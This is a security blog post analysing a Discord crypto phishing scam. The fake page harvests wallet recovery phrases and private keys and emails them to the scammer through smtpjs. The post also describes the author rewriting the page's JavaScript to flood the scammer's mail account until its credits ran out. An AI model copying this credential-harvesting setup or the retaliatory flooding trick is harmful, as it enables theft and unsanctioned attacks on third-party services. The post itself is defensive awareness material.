Analyse of a crypto scam

May 6, 2024 by Arnaud Stoz | 100 views

Blockchain Ethereum

https://cylab.be/blog/340/analyse-of-a-crypto-scam

If you ever connected to a discord server related to ethereum (geth, ethereum.org) you probably noticed that despite very useful information given about the technology, those server are also unfortunately full of scammer... Let's have a look at one of them and analyse the scam it propose.

Scammer methodology

The methodology of those scammer are really simple and can be resumed to the following

  1. They will contact you by private message pretending being from support team. first_contact.png
  2. If you show a little of interest, they will redirect you to a website where you will be asked to connect your wallet. They will ask you to input all your information about your wallet. Those information include:
    • Your recovery phrase
    • Your keystore
    • Your private key (⚠️ never give your private key to anybody ) website.png

Website analysis

Now that we know a bit more the methodology used by those scammer, let's analyse it. When looking at the page source we notice that clicking on the button call the function sendEmail(). page_source.png

Let's have a look at the sendEmail function sendemail.png We have a lot of interesting insight of how the website is working.

  • first it check if the value input are matching certain condition. If not it show a pop up to kindly ask to complete correctly all data
  • then it send an email to an hardcoded recipient with an hardcoded sender. It use the smtpjsV3 for sending an email.

We now have a good understanding on how the scam is working. It trick the victim to enter his wallet details and send them via email from an hardcoded address to an hardcoded receiver.

By replacing the receiver address to a temporary email address in our control we can have a look at the email received by the attacker. email.png.

⚠️ Disclaimer

Once a scammer has been identify, the best thing to do is to report it to all the services used by this scammer.

The next part is explained purely for educational purpose, to show how javascript can be manipulated to completely change the behavior of a page.

⚠️ Do not reproduce, simply report all scam to appropriate service.

Manipulating Javascript

Now that we have all the information about the scam, let's have a deeper look at the smtpjs library. The smtpjs rely on elasticemail to works properly. Having a look at the elasticemail we can see it is a paid service used to to send and manage marketing email campaign. We can then use the account created by the scammer to send him a lot of email with fake credentials.

Simply by modifying the code of the sendMail function, we can remove the check on the input and put the Email.send call in a for loop.

Once the code is modify we can click the button. After some email sent we receive the following message:

Service not available, closing transmission channel. The server response was: 026aac1d-071a-426f-b432-1e41d73ad719 Error: 421 Error: Not enough credit.

That means all the credit bought by the scammer to send email has been exhausted. Nobody else can be scammed using this specific website.

In the mean time the scammer has been reported to the appropriated service, namely smtpjs and discord

Conclusion

As we have seen here, this scam is very basic

  • it ask for credentials of the user on the web page with a basic javascript in it.
  • Then send an email to the scammer container the credentials entered on the webpage.

When dealing with blockchain technology on discord, please remember:

  • Do not trust any support guy contacting you via DM
  • Report any scam you identify
  • Never ever share you private key or recovery phrase with anybody

This blog post is licensed under CC BY-SA 4.0

This website uses cookies. More information about the use of cookies is available in the cookies policy.
Accept